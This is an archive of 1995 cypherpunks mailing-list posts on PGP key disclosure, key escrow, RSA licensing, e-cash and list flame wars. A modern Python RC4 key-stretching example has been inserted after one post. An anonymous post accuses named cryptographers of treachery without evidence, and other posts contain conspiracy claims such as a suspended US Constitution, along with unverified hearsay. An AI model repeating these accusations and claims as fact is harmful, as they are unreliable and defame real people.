-----BEGIN PGP SIGNED MESSAGE-----

well well well, our anon friend flames away with 'shut up' 'shut up' 'shut up'. ain't free speech nice. it's so nice to see the remailers put to such good use!

if you are going to post flames and worthless commentary the least you could do is sign the mesg so we can killfile you.

mr. anon, perhaps you've noticed that the govt pretty much does what they want. in this instance we have the chance to have some influence (albeit minor) on what the outcome is.
or, perhaps you're just some TLA stooge sent to disrupt our plans to take over the world.

i suppose you think we should just tell the govt to 'shut up'. yup, that will do the trick. they'll just say, 'gee, sure. sorry we tried to take away your privacy. our fault.' right. the govt would prefer a nice docile populace that goes to work and pays their taxes without talking back.

in any event, this isn't the first grade. we don't tell people to 'shut up'.

-pat, another irish, but ex-catholic, ridiculously cheap labor involving biochemistry

patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11  -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu

From don at cs.byu.edu Sat Sep 9 14:00:04 1995
From: don at cs.byu.edu (Donald M. Kitchen)
Date: Sat, 9 Sep 95 14:00:04 PDT
Subject: Scientology tries to break PGP - and fails?
Message-ID: <199509092058.OAA21485@bert.cs.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

>hack..print out the idea key.
>using the IDEA key directly.

This would be a neat addition to PGP. It would be fun to take random data and slap PGP headers on it, and maybe throw in a real encryption that doesn't report the true IDEA key. It would be a valuable trick for StealthPGP / stego systems, if we ever need it.

Don

fRee cRyPTo!
jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From MMac102754 at aol.com Sat Sep 9 14:05:01 1995
From: MMac102754 at aol.com (MMac102754 at aol.com)
Date: Sat, 9 Sep 95 14:05:01 PDT
Subject: Sigh Re: not a flame please read and think about this
Message-ID: <950909170449_15035342@mail04.mail.aol.com>

Mr anon, if you want to flame, sign your name.

M MacLeish = MMac102754 at aol.com

From joelm at eskimo.com Sat Sep 9 22:11:02 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Sat, 9 Sep 95 22:11:02 PDT
Subject: Bidzos citizenship?
Message-ID: <199509100434.VAA10595@mail.eskimo.com>

In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bidzos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?

Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment.

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

From mnorton at cavern.uark.edu Sat Sep 9 22:11:18 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sat, 9 Sep 95 22:11:18 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
In-Reply-To:
Message-ID:

For some reason I think it was French, but I don't have a citation either. But I think you're right.

MacN

On Sat, 9 Sep 1995, Michael Froomkin wrote:

> Ah. but if there is no plaintext, the question is whether you comply
> with the rule by providing the encrypted text rather than plaintext. I
> would say you have to provide the plaintext in the absence of a legitimate
> privilege claim, but I don't recall a case to this effect (there is
> precedent for requiring translation of foreign language documents when
> the request is covered by an evidence convention; I don't recall if there
> are any such cases that fall purely under domestic US rules). Anyone have
> chapter and verse?
>
>
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | mfroomki at umiami.ir.miami.edu
> U. Miami School of Law     |
> P.O. Box 248087            | It's hot here. And humid.
> Coral Gables, FL 33124 USA |
> See (soon to move to its real home): http://www.law.miami.edu/~mfroomki
>
>

From anon-remailer at utopia.hacktic.nl Sat Sep 9 22:13:09 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Sat, 9 Sep 95 22:13:09 PDT
Subject: not a flame please read and think about this
Message-ID: <199509100245.EAA09943@utopia.hacktic.nl>

i know this is unpopular but i wish someone would respond to the points rather than flaming me. pat farrel is the only one of you with the balz to try to defend himself instead of attacking me. and you attack me for being anon. i love it. cypherpunks yea right. more of the indefensible.

ive been keeping a list: janet renos cypherpunk heroes:

wei dai patents algorithms - for microsoft!!!!. that should fucking help us a lot. whos he gonna sue first? hey i think ill patent xor!!!! and give the patent to the nsa!!!

according to sci.crypt mat blaze can prove that clipper has no back door. right. that sure helps us. david sternlights new hero.

pat farrel signs up with the nsa to make the key escrow rules easier for us morons to understand. hey thanks. maybe theyll give you a nicer room in the concentration kamp. a whole shitload of socalled cypherpunks jumping over each other to help and defend him.

brian davis tries to convince us that key escrow isnt so bad (who signs your paycheck davie?????)
that guy from rand corp tells us words of wisdom from robert morris the nsa guy as if we should write them down and pray three times a day to them.

carl ellison designs key escrow for tis and acts like hes one of us.

bruce schneier is copyrighting crypt programs and threatening to sue people who use it.

even phil zimmermann is selling the rights to pgp. what about all the people who contributed code (like me). not a dime for us because phil is famous and your not allowed to say anything bad about him. sorry i forgot phil is god. no one dares to complain. ask phil about me and when i asked about sharing profits from the code i contributed. also about the deal with r.f...

by the way i am not the anonymous-remailer at shell.portal.com person who told farel to shut up. that was someone else. i dont think anyone should shut up. thats my point. i think we should talk about this in the open. got it perry???

lets get back to being punks. fuck these traitors. do crypto and fuck the nsa.

an116512 at anon.penet.fi

From dsc at swcp.com Sat Sep 9 22:13:50 1995
From: dsc at swcp.com (Dar Scott)
Date: Sat, 9 Sep 95 22:13:50 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
Message-ID:

Phill wrote,

>One solution to this problem would be to modify PGP so that the session
>key for the document was released rather than the passphrase for the public key. The
>former would provide only read access, the latter would allow the
>scientologists to forge Wollersheim's signature on other material. In addition many of the
>documents may be subject to privilege.

It seems to me that if this kind of risk was seen ahead of time that a method doing the equivalent using ordinary PGP commands could be agreed upon by all involved. The document could be encrypted using "PGP conventional encryption" and the pass phrase for that could then be encrypted using the public key. The encrypted document would thus consist of these two parts.
The breaking of the traditional decryption into its two parts would not be needed--superficial use of PGP would work.

The owner of the public key--who is in possession of the document encrypted as suggested--when threatened by an attacker--who is also in possession of the document--with an unbearably high cost for not giving up his secret key can offer to give up the password for the "PGP conventional encryption".

This method does not define how the password is obtained and that might be a weakness.

I confess I'm new to PGP (and this subject in general) and am ignoring the suggestion in Tim May's FAQ that newbies try not to look clueless.

Dar Scott

===========================================================
Dar Scott                      Home phone: +1 505 299 9497
Dar Scott Consulting           Voice:      +1 505 299 5790
8637 Horacio Place NE          Email:      darscott at aol.com
Albuquerque, NM 87111                      dsc at swcp.com
Fax: +1 505 898 6525     http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From adam at lighthouse.homeport.org Sat Sep 9 22:15:47 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 9 Sep 95 22:15:47 PDT
Subject: RSA licensing costs?
Message-ID: <199509100038.UAA06872@homeport.org>

Does anyone know how much RSA wants per desktop in a large client application? Using the BSAFE derived licenses would be fine for this. (We're looking at 2-10k licenses for a nameless financial institution, doing those things that RSA likes. :)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -- Hume

From seawolf at challenger.atc.fhda.edu Sat Sep 9 22:18:38 1995
From: seawolf at challenger.atc.fhda.edu (Sameer R Manek)
Date: Sat, 9 Sep 95 22:18:38 PDT
Subject: Sigh Re: not a flame please read and think about this
In-Reply-To: <53877.pfarrell@netcom.com>
Message-ID:

I think we can end this childish flaming.
I hope both Pat and an116512 are mature enough not to respond to this post and, if they want to, make sure they keep the mailing list out of this. If you both want to flame each other take it to private email and flame away.

From scs at lokkur.dexter.mi.us Sat Sep 9 22:22:21 1995
From: scs at lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 9 Sep 95 22:22:21 PDT
Subject: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <1995Sep9.230847.16371@lokkur.dexter.mi.us>

anonymous-remailer at shell.portal.com writes:

>Then shut up.

[[ drivel excised ]]

>Then shut up.

Please do us the favor of using a killfile-able name in the future.

--
"Captain Kirk and I both want the same thing: the whole-hearted devotion of a naive alien. And if certain things stand in our way -- Klingons for Kirk, reality for me -- well, we just have to suck in our guts, set the phasers on Stun, and hope for the best."
                                        Ian Schoales (Merle Kessler)

From mfroomki at umiami.ir.miami.edu Sat Sep 9 22:31:29 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Sat, 9 Sep 95 22:31:29 PDT
Subject: Brand e-cash implementation?
Message-ID:

Have there been any implementations, even as trials, of Brands' protocols? Do any ecash systems on the drawing board even include real user anonymity?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law     |
P.O. Box 248087            | It's hot here. And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki

From mfroomki at umiami.ir.miami.edu Sat Sep 9 22:33:22 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Sat, 9 Sep 95 22:33:22 PDT
Subject: Dishonest banks & ecash
Message-ID:

I've been doing some ecash reading. The threat model is the dishonest user or 3rd party who tries to mint the stuff.
Any work been done on the problem of the dishonest bank (a la Bcci) that tries to mint the stuff?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law     |
P.O. Box 248087            | It's hot here. And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki

From starrd at iia2.org Sat Sep 9 22:39:24 1995
From: starrd at iia2.org (starrd)
Date: Sat, 9 Sep 95 22:39:24 PDT
Subject: Bidzos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID:

On Sat, 9 Sep 1995, Joel McNamara wrote:

> Date: Sat, 09 Sep 1995 21:34:11 -0700
> From: Joel McNamara
> To: cypherpunks at toad.com
> Subject: Bidzos citizenship?
>
> In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bidzos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?
>
> Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment.
>
> Joel McNamara
> joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
>

You should consciously be aware that the U.S. Government *will* break its own laws to further its goals. You should know that such a law as "this shall be the law unless the Fuhrer disagrees and then what the Fuhrer says shall be the new law" [yes, such a law was in Nazi Germany's lawbooks] in the states we call it "Executive Order" and with the U.S. being one of the most powerful outlaw governments on this planet, you should watch them anyway.

Don't count on your citizenship or location outside of the US as protecting you. If they want you, you are dead-meat. You know it too!
BTW, if you are going to say 'well the US has a Constitutioon, we'll we *dont* it was suspended in 1933... ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From greg at ideath.goldenbear.com Sun Sep 10 00:07:21 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sun, 10 Sep 95 00:07:21 PDT Subject: Internet commerce mtg, Denver Message-ID: <199509100705.AA22815@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- L. Detweiler's tentacle Vlad Nuri writes: > [...] > the rep told me something interesting: he said that every > Bell phone book is actually "seeded" with dummy names > so they can detect copyright infringers. if you come out > with a business directory, these Bells will just scan for > the fake names that they have inserted into their own listings. > if they find them, supposedly they can show them to a copyright > judge and he will immediately close down your operation and > fine you, almost no questions asked. 
> I didn't know how much
> of this really happens (the legal stuff sounded questionable
> to me) but it is an interesting "real world" instance of
> copyright terrorism prevention that the "information liberation
> front" would have to contend with.

While he's correct that publishers of data compilations do use dummy entries to track [mis]use of their data, he's incorrect when he asserts that it's possible to get a copyright on an ordinary white-pages style directory. (_Feist v. Rural Telephone_, 499 US 340 (1991), http://www.law.cornell.edu/supct/classics/499_340v.htm ).

This practice occurs when mailing lists are sold, and in the drafting of maps (non-existent streets or sections of streets may be added, or changed in an unremarkable way). It's also possible (and getting easier with laser printers, etc) to generate apparently identical but distinguishable documents for use where disclosure of the documents is controlled; the distinguishing parts (perhaps a misspelled word or other apparent typo, or a change in line spacing between paragraphs, or altered line breaks) can then be used to trace a recovered "leaked" document to the person who received it originally. Where the documents are digital (or digitizable), two or more recipients could collude to 'diff' their copies, and find the barium data; but a savvy document-distributor could generate copies with multiple ID-bits, such that any two copies might have differences between the two, but barium data that's the same yet different from the other participants. So those two colluders round up a third recipient [...]

It's basically a form of very-low-bandwidth text-only steganography.

Of course, we're wandering into FAQ territory; isn't there something in the Cyphernomicon about digital signatures for physical items being used as proof of source?
(e.g., you'll know that the expensive motorcycle part you just bought really *is* from Harley-Davidson, not a cheaper part placed in a knockoff Harley box)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFIOtX3YhjZY3fMNAQGlwAP+KhhBK1MGDvsNizH5Pu7XsqQg6rPxnCp2
q5YRZrQyVktit8hK+TbHcodAvG7IWK2vFuI1y80dFx5sKfAqjLU81rth7Pad7nRm
USUYUIxlvnaO7dOWUPMsEaaad2uZpLn/ALoTwXsYqzT2YjPyl1/YYLTHkmK/PHUI
5C6yJNKtpAY=
=CwZF
-----END PGP SIGNATURE-----

From AlanPugh at MAILSRV2.PCY.MCI.NET Sun Sep 10 01:54:29 1995
From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh)
Date: Sun, 10 Sep 95 01:54:29 PDT
Subject: Certificates/Anonymity/Policy/True Names
Message-ID: <01HV3KI1816A8ZH61F@MAILSRV1.PCY.MCI.NET>

> What about when the CA signing key is stolen, factored, or otherwise falls
> into the wrong hands, thereby possibly making every signature made by the CA
> worthless, or at least questionable?
>
> I assume liability will be based on the CA's efforts to ensure the integrity
> of the signatures it makes (and therefore the confidentiality of the secret
> key components), but what constitutes due diligence? As we all know,
> security measures cover a very wide range and can reach ridiculous
> proportions on both ends of the spectrum... How much security will be
> 'enough' from a legal standpoint...?

an excellent point, and one that i'd not seriously considered until i saw your post. given today's legal climate, assuring the confidentiality of a ca's key would be pretty expensive. i suppose burning cd-roms with all transactions would help to document all transactions, but would not be definitive as far as the signatures go. any document signed with the key would really have to be considered valid if the signature itself is to really mean anything in a legal sense. if one were to allege that a signature is not valid, even though it checked out cryptologically, how could one defend against a charge that the secret key had been compromised? you cannot prove a negative.
obviously, ianal, but i would think it would be reasonably easy to convince at least one jury member that there is a reasonable doubt that the key had been compromised. then again, it might be similar to a claim that a signature has been forged. i think there could be a danger of allowing the confidence in a given piece of crypto to unduly influence a jury of a document's authenticity when the key _had_ been compromised. the 'gee wiz' factor could be fairly significant among juries. given statements like 'you could take all the computers on the planet and let them crunch on it for a billion years would be needed', a jury might miss issues of security.

fwiw, my 2 cents...

*********************************************
*     /     Only God can see the whole      *
*  O[%\%\%{<>===========================-   *
*     \     Mandelbrot Set at Once!         *
*                  amp                      *
*         <0003701548 at mcimail.com>        *
*                                           *
*********************************************
Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D

From anonymous-remailer at shell.portal.com Sun Sep 10 02:10:05 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 10 Sep 95 02:10:05 PDT
Subject: PGP in UK
Message-ID: <199509100908.CAA23542@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

I heard something rather disturbing the other day from someone I do business with. I've been telling this company for 18 months or so about the advantages of PGP and email rather than faxes, and they finally tried it, liked it, and decided to use it a month or so ago. Last week they got a visit from the Department of Trade and Industry and MI5 (or is it MI6?) telling them to stop using PGP or they might find difficulties getting export licences for their products in future. The visitors wouldn't say how they knew this company had been using it.
The person who told me about this also said something about a Department of Trade & Industry paper which mentioned that the British Government was going to insist on key escrow for encryption. I had hoped to get a copy of this, but he can't find it at the moment. I'll post the text when I get it if anyone's interested.

Anyone else in the UK heard anything about this?

- --
B.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQEVAgUBMFGPfeHVHXeXphJJAQFJ0Af/Svh0ifULgpEuauSBPFreDDJoa/a1gcPe
ya3CjOde9kVuN0IkBHFubO18MrAO6WbwlhVa/X/pjG4vbSahonpzmgHHfkVW20Gh
qlhBwFLElTmOgspSjHJ74sYNUM2YZ+AKOyNwW4ix6woJ0WL0NP+cV8CZv4tdEH4l
EI3/FuoFccbkKMk7QYoRPOyj5FI4GiFxVsg1GFOU3r83bxfJDfU2yZdImEBx/Nlc
gteizqFTF/QiKckl6f5NzCBzaoIcMw0VLN8dAGLqzDycJtFqGdOPgvgSt1LwXKBs
+zJM5Z/laubYm5SiEPy4oVz9N3lT4EOzEtdMEoiSC6IiSDSaURkEAA==
=GiY0
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQENAi8KzVoAAAEH/2gPfD2Xdw1nDAXtMH/F5iCMrwdXHXolEfOjRP59QP1Yodhb
L+NGSNls67+H1us5PP5EpHDbHRy66ExgRK7XdZ/2qz0SsbTG+R6pRIILmMfgd3Nj
M6uq1DehdxWPdp4PMC9LNrG2V9QrRGPgpHhr3iDfy+p6JTjW8XCYUXn5POt0wBs2
n/vlowjLf9dVYwUKP58V9gokNsFlGcB08gEbxKa9Y2X7zB3BAlywPVdKVh+BOTCK
z1Sofx9Wup0MEXEDEESLDSq/634hzzVx6Kt54cZBbi5nAdPHWlGHZl5vU93A3jPE
fh59JXsCZmWKLXMjZtjcIJYkC4hC4dUdd5emEkkABRG0DEIuIERlIExhIFBheokB
FQIFEC8g7yzh1R13l6YSSQEBD+4H/ir8R4iw1tWLUuxz6etmV99OhMUYoI5lQnxz
9KARQf4eD3xHPoMw6tHLKOUR8xYS9i2RmkhJrPRzCfD5OKSOBEHuIQEt/+dcbCuw
0fxn9NrU7NjFWwWKQ+0jYikN3hfIWcPmGtyhQ0KSrGfUDo5+rJr5Cy4U6eOooepv
gYniecNNVAzQ2KDiWTOZ5zqG3zBAYj6uw8LHvBR1qol2YcJ4s02c4GdAZmzEq49s
nDBortKfWUAxZkESBt2tMx8gYq6b38evYJBLXOqEN5Lt/5zf0nG1u0BEWBLaCj55
y8lh1KolVOu808tX9blOrjqwEB12vngjXzf7hHWohrGrrQVT2N4=
=5qEt
-----END PGP PUBLIC KEY BLOCK-----

From AlanPugh at MAILSRV2.PCY.MCI.NET Sun Sep 10 02:14:20 1995
From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh)
Date: Sun, 10 Sep 95 02:14:20 PDT
Subject: remailers
Message-ID: <01HV3L6O9GWI8ZH626@MAILSRV1.PCY.MCI.NET>

where can i find a good 'how to' faq on anonymous remailers?
i've looked around and found several documents that tell me what they are, but no good information on how to use the various remailers. pointers are appreciated.

*********************************************
*     /     Only God can see the whole      *
*  O[%\%\%{<>===========================-   *
*     \     Mandelbrot Set at Once!         *
*                  amp                      *
*         <0003701548 at mcimail.com>        *
*                                           *
*********************************************
Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D

From jya at pipeline.com Sun Sep 10 07:14:46 1995
From: jya at pipeline.com (John Young)
Date: Sun, 10 Sep 95 07:14:46 PDT
Subject: PGP in UK and GAK
Message-ID: <199509101414.KAA09600@pipe4.nyc.pipeline.com>

Responding to msg by anonymous-remailer at shell.portal.com () on Sun, 10 Sep 2:8 AM

[Snip]

>The person who told me about this also said something
>about a Department of Trade & Industry paper which
>mentioned that the British Government was going to
>insist on key escrow for encryption.
>
>Anyone else in the UK heard anything about this?

Picking up the possible mandated use of key escrow in the UK:

There was chat at the NIST key escrow meeting that low-bit key escrow may be the global policy in the works among governments. With a blanket outlawing of all non-escrowed systems. And, that US key escrow and 64-bit export policy is a harbinger of domestic regulation.

A fed at the B-2 breakout session imperiously barked the mantra chanted by several feds at the general meeting, "64-bit encryption is what industry asked for, why are you now complaining." To the counter-question, "what industry are you referring to?" the answer was always just "industry."

The USG's latest key escrow policy, the NIST meetings and the Intellectual Cryptography Institute's conference "Global Challenges" posted here may be the surfacing of a well-orchestrated government and "industry" collusion on this issue. Note the common ever-present attendees of both NIST and the ICI meetings.
Certainly, some "industry" spokespersons like "Daughter of Clipper" Denning presume by their tone of writing that key escrow is on its way to supremacy, with only quibbling left on the criteria for acceptably "competitive" variations. The NIST handouts of industry players seem to bear this out as well, even as some join the public kibitzing. Perhaps their raz, and that of BSA, is just a diverting smokescreen to induce complacency -- or squeaking wheels to get USG attention for sweetheart contracts. Maybe they've already met privately with USG reps to get rewarded with a piece of the PGP/non-escrow clamp-down biz -- more venerable suckling of national security kabooty as advised by smart-varmints like ex-NSA Mr. Stewart Abercrombie Baker, Every-meet-attending-Esq.

I wonder if Mrs. Denning and Mr. Baker are advising their sweating crypto clients, "if you can't beat 'em, join 'em, the international escrow train is leaving the station, better get on before it's too late." While fretting of derailment by hackers, or worse, by international security agencies paranoid of gov-biz complicity to take over the "if you knew what I knew" crypto-protected cornucopia.

Wonder who's really engineering this GAK Limited runaway? Does anybody know David Kahn well enough to ask what he's finding as NSA Visiting Historian -- in the archives and in the job-insecure-spook resumes heat-seeking crypto fires?

From thad at hammerhead.com Sun Sep 10 07:52:10 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 07:52:10 PDT
Subject: RSA licensing costs?
Message-ID: <199509101443.HAA04907@hammerhead.com>

Adam,

I called RSA last week to get information on licensing Diffie-Hellman for a videoconferencing application. They said that "They provide the BSAFE development toolkit, but don't license the technology" and gave me the number of PKP to license the technology itself. I called a Mr.
Fougmer at PKP, (408 735-5893), his message says that he'll be out of town until the 18th of September, and if you want to leave a message, call back after that date.

Now, I could be completely confused, it wouldn't be the first (or even the 100th) time. If you can get a standard license by using the BSAFE toolkit, and they had a standard price for that, well, I didn't give Linda De Los Reyes at RSA (415 595-8782) a chance to tell me that.

thad
--
Thaddeus Beier                 email: thad at hammerhead.com
Technology Development         vox: 408) 286-3376
Hammerhead Productions         fax: 408) 292-8624

From thad at hammerhead.com Sun Sep 10 08:12:45 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 08:12:45 PDT
Subject: 64 bit crypto
Message-ID: <199509101504.IAA04932@hammerhead.com>

Say that we wanted to use 80 bit RC4 for our crypto application, but we were only allowed to use 64 bit crypto because we lived in some police state that enforced its wishes. Couldn't we modify RC4 easily to provide the same security against brute-force attacks by just running the key-setup phase 65536 times instead of just once? That would slow down the key-setup (on my machine) from 50,000 per second to just over 1 second, but so what? It takes ATT more than 1 second to set up a long distance call, I can wait another second to start the conversation.

If our breaking of 40 bit RC4 was a one, then this 64 bit RC4-modified would be a 109,951,162,776, well beyond possibilities that I can imagine. You might say that you could save all 2^64 key tables, but that is a huge amount of data, millions of terabyte-capacity tapes.

In the GAK proceedings, I have never heard of any limitation on the algorithm, just that it be public and 64 bits or less. And, of course, have GAK.

Of course, it wouldn't surprise me for this kind of technical fix to be immediately outlawed by the aforementioned police state.
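The idea in Thad's message above (repeat the key schedule so each brute-force guess costs more work, what is now called key stretching), worked through as an added example. This is editor-supplied illustration code, not code from Thad's post or from any RC4 implementation he used; it assumes one concrete reading of "running the key-setup phase 65536 times", namely repeating RC4's 256-step mixing loop over the same state, and it puts numbers on both the attacker's per-key cost and the precomputed-table shortcut the post mentions. The `passes` parameter, the helper names and the sample key and message are all constructed for this example.

```python
"""Key stretching by repeating the RC4 key schedule (constructed example).

Not code from the mailing-list post: it implements RC4 with the key
schedule's mixing loop repeated `passes` times and quantifies what that
does to exhaustive search.  RC4 appears only because it is the cipher
under discussion; repeating its schedule does nothing about its known
keystream biases, it only multiplies the cost of each key trial.
"""
import math


def rc4_ksa(key: bytes, passes: int = 1) -> list:
    """RC4 key scheduling.  passes=1 is plain RC4.  passes>1 repeats the
    256-step mixing loop over the same permutation, carrying j across
    passes, so every candidate key costs `passes` times as much to test."""
    if not key:
        raise ValueError("empty key")
    if passes < 1:
        raise ValueError("passes must be >= 1")
    S = list(range(256))
    j = 0
    klen = len(key)
    for _ in range(passes):
        for i in range(256):
            j = (j + S[i] + key[i % klen]) & 0xFF
            S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(S: list, n: int) -> bytes:
    """Standard RC4 output generation (PRGA) from a scheduled state."""
    S = S[:]  # work on a copy so the scheduled state can be reused
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes, passes: int = 1) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse) under a schedule
    stretched `passes` times."""
    ks = rc4_keystream(rc4_ksa(key, passes), len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def effective_key_bits(key_bits: int, passes: int) -> float:
    """Exhaustive-search work in bits: 2**key_bits candidate keys, each
    costing `passes` schedule passes.  64 bits with 2**16 passes gives 80
    bits of work, which is the post's claim."""
    return key_bits + math.log2(passes)


def work_ratio(key_bits: int, passes: int, baseline_bits: int = 40) -> int:
    """How many times harder exhaustive search is than against a plain
    baseline_bits-bit key (the post compares against 40-bit RC4)."""
    return (2 ** (key_bits - baseline_bits)) * passes


def table_storage_bytes(key_bits: int) -> int:
    """Storage for the precomputation shortcut the post mentions: one
    256-byte scheduled state per possible key."""
    return (2 ** key_bits) * 256


if __name__ == "__main__":
    # Known-answer check for unstretched RC4 (the classic "Key"/"Plaintext"
    # vector), then a stretched round trip on a constructed message.
    assert rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
    msg = b"call setup can wait a second"
    ct = rc4_crypt(b"8bytekey", msg, passes=4096)
    assert rc4_crypt(b"8bytekey", ct, passes=4096) == msg
    print("work bits, 64-bit key x 65536 passes:", effective_key_bits(64, 65536))
    print("work relative to 40-bit RC4:", work_ratio(64, 65536))
    print("bytes to store every 64-bit key's state:", table_storage_bytes(64))
```

The two cost functions make the trade-off explicit: the legitimate user pays the 65536 passes once per session, while an attacker pays them once per candidate key, and the only way around that is to store a scheduled state for every key, which `table_storage_bytes(64)` shows is 2^72 bytes.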
thad
--
Thaddeus Beier                 email: thad at hammerhead.com
Technology Development         vox: 408) 286-3376
Hammerhead Productions         fax: 408) 292-8624

From bdavis at thepoint.net Sun Sep 10 08:52:33 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Sun, 10 Sep 95 08:52:33 PDT
Subject: If this thread didn't start with a flame then I'm ...
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID:

On Sun, 10 Sep 1995, Anonymous wrote:

>
> i know this is unpopular but i wish someone would respond the the points
> rather than flaming me. pat farrel is the only one of you with the balz
> to try to defend himself insead of attacking me. and you attack me for
> being anon. i love it. cypherpunks yea right.
> ...
>
> brian davis trys to convinice us that key escrow isnt so bad (who signs your paycheck davie?????)
>
> an116512 at anon.penet.fi
>

An:

You flamed me several months ago, essentially for being a govt flunky in the boonies. You didn't respond to my last post on the topic ...

Many of us (apparently) have trouble with flames originating from "the great and powerful Oz" who may be, in fact, a nonachiever hiding behind a curtain. I guess we need Toto to pull away your curtain of privacy!

If you don't like diverse viewpoints, either persuade this list's owner to change his charter or start your own list. Then maybe *I'll* start posting anonymously.

You also misread the purpose of my post re MKE. The purpose was for me to get a sense whether some number of Cypherpunks might agree to some form of MKE (i.e. would some kind of protection that the government might accept, also be acceptable to most/some on the list). I received a number of thoughtful and thought provoking replies. I was expecting your flame, but I see you decided to use your blunderbuss rather than a rifle.

And you are, of course, correct. Make no attempt to understand your enemy. Stand your ground regardless. No tactical retreats, no overall strategy. Was this from Sun Tzu?
EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!

From perry at piermont.com Sun Sep 10 09:34:06 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 10 Sep 95 09:34:06 PDT
